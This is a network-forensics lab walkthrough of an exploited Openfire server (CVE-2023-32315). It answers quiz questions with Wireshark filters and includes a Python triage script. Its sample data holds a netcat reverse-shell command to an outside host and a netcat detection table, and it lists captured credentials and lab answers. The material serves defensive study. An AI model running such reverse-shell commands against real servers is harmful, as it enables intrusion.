Openfire Lab
Q1) What is the CSRF token value for the first login request?
http.request.method == POST

Answer: tmJU6J9uym8oIOD
Q2) What is the password of the first user who logged in?
http.request.method == POST
Answer: Admin@Passw0rd#@#
Q3) What is the 1st username that was created by the attacker?
frame contains "create"

or, restricting the match to the request URI:

http.request.uri contains "create"

Answer: 3536rr
Q4) What is the username that the attacker used to login to the admin panel?
http.request.method == POST

Then follow the TCP stream.

Answer: a7zo4l
Q5) What is the name of the plugin that the attacker uploaded?
http.request.method == POST

Then follow the HTTP stream.

Answer: openfire-plugin.jar
Q6) What is the first command that the user executed?
http.request.method == POST

http.request.uri contains "action"

Answer: whoami
Q7) Which tool did the attacker use to get a reverse shell?
http.request.uri contains "action"

Answer: netcat
Q8) Which command did the attacker execute on the server to check for network interfaces?
The attacker utilized port 8888 for establishing a reverse shell. Let's apply a filter to focus on traffic associated with this port.
tcp.port == 8888

Next, let's follow the TCP stream.

Answer: ifconfig
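The questions above are all answered with the same handful of Wireshark filters (http.request.method == POST, http.request.uri contains "create", http.request.uri contains "action", tcp.port == 8888) plus a Follow Stream. The script below is an added example, not part of the original lab writeup, that replays those filters as Python over a small constructed set of HTTP request records, so the same triage can be scripted against an exported capture. Every URI, token, credential, filename and host in it is constructed for illustration; the paths are hypothetical and are not Openfire's real ones, and the SHELL_TOOLS table is an assumption about which tool names a defender would want flagged.

```python
"""
Added example (not from the lab writeup): Wireshark-style triage of HTTP
requests in Python. All sample data below is constructed for illustration.
"""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit


@dataclass
class HttpRequest:
    stream: int   # TCP stream index, like Wireshark's tcp.stream
    method: str
    uri: str
    body: str = ""

    def form(self) -> dict:
        """Decode a urlencoded body into {field: first_value}."""
        return {k: v[0] for k, v in parse_qs(self.body).items()}


# Constructed sample capture (hypothetical paths, tokens and credentials).
SAMPLE_REQUESTS = [
    HttpRequest(0, "GET", "/login.jsp"),
    HttpRequest(1, "POST", "/login.jsp",
                "csrf=EXAMPLE_TOKEN_1&username=admin&password=ExamplePass1"),
    HttpRequest(2, "POST", "/admin/user-create.jsp",
                "csrf=EXAMPLE_TOKEN_2&username=example_user&password=p&isadmin=on"),
    HttpRequest(3, "POST", "/login.jsp",
                "csrf=EXAMPLE_TOKEN_3&username=example_user&password=p"),
    HttpRequest(4, "POST", "/admin/plugin-admin.jsp?uploadplugin",
                'Content-Disposition: form-data; name="uploadfile"; '
                'filename="example-plugin.jar"\r\n\r\nPK...'),
    HttpRequest(5, "POST", "/plugins/example-plugin/cmd.jsp?action=command",
                "command=whoami"),
    HttpRequest(6, "POST", "/plugins/example-plugin/cmd.jsp?action=command",
                "command=nc+203.0.113.5+8888"),
    HttpRequest(7, "POST", "/plugins/example-plugin/cmd.jsp?action=command",
                "command=ifconfig"),
]

# Assumed mapping of tool names a defender wants flagged when they show up
# as the first word of an executed command.
SHELL_TOOLS = {"nc": "netcat", "ncat": "netcat", "netcat": "netcat"}


def posts(reqs):
    """Equivalent of the filter http.request.method == POST."""
    return [r for r in reqs if r.method == "POST"]


def uri_contains(reqs, needle):
    """Equivalent of http.request.uri contains "<needle>"."""
    return [r for r in reqs if needle in r.uri]


def first_csrf_token(reqs):
    """Q1: CSRF token carried by the first POST (here a login form)."""
    return posts(reqs)[0].form().get("csrf")


def login_credentials(reqs):
    """Q2/Q4: (username, password) of every POST to the login page, in order."""
    return [(r.form().get("username"), r.form().get("password"))
            for r in posts(reqs) if urlsplit(r.uri).path.endswith("/login.jsp")]


def created_usernames(reqs):
    """Q3: usernames submitted to any user-creation URI."""
    return [r.form().get("username") for r in uri_contains(posts(reqs), "create")]


def uploaded_plugins(reqs):
    """Q5: filenames pulled from multipart plugin-upload POST bodies."""
    names = []
    for r in uri_contains(posts(reqs), "uploadplugin"):
        names += re.findall(r'filename="([^"]+)"', r.body)
    return names


def executed_commands(reqs):
    """Q6/Q8: commands sent through the plugin's action endpoint, in order."""
    return [r.form().get("command") for r in uri_contains(posts(reqs), "action")]


def shell_tools_used(reqs):
    """Q7: known shell tools seen as the first word of an executed command."""
    found = []
    for cmd in executed_commands(reqs):
        tool = SHELL_TOOLS.get(cmd.split()[0]) if cmd else None
        if tool and tool not in found:
            found.append(tool)
    return found


def commands_mentioning_port(reqs, port):
    """Cross-check for tcp.port == <port>: commands that reference that port."""
    return [c for c in executed_commands(reqs) if re.search(rf"\b{port}\b", c or "")]


if __name__ == "__main__":
    print("csrf:", first_csrf_token(SAMPLE_REQUESTS))
    print("logins:", login_credentials(SAMPLE_REQUESTS))
    print("created:", created_usernames(SAMPLE_REQUESTS))
    print("plugins:", uploaded_plugins(SAMPLE_REQUESTS))
    print("commands:", executed_commands(SAMPLE_REQUESTS))
    print("shell tools:", shell_tools_used(SAMPLE_REQUESTS))
    print("port 8888:", commands_mentioning_port(SAMPLE_REQUESTS, 8888))
```

On a real capture, export the HTTP requests first (for example with tshark's field output) and build HttpRequest records from them; the filter helpers are deliberately kept as plain substring and method checks so they map one-to-one onto the display filters used in the walkthrough.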
Q9) What is the CVE of the vulnerability exploited?
Answer: CVE-2023-32315